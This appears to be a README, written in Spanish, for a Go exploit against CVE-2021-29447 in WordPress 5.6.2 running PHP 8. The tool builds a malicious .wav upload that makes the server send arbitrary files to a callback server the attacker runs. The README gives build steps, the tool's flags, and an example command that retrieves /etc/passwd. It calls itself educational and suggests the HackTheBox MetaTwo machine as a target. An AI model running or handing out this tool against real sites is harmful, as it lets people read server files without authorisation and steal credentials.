
Exploit basado en Go para CVE-2021-29447 dirigido a WordPress 5.6.2 con PHP 8. Genera un payload .wav malicioso para recuperar archivos arbitrarios del servidor mediante la carga de medios, requiriendo acceso básico a wp-admin.
Solo para fines educativos.
Se supone que este exploit es una herramienta muy conveniente para obtener cualquier archivo de un servidor que ejecute wordpress 5.6.2 y php8. (ver https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
Todo lo que necesitas es acceso básico a wp-admin y la capacidad de subir un archivo multimedia.
El exploit generará un payload de archivo .wav para subir usando wp-admin.
Luego utiliza el servidor de retorno del exploit para darte el archivo deseado directamente en tu consola.
El uso perfecto es la máquina de HackTheBox - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd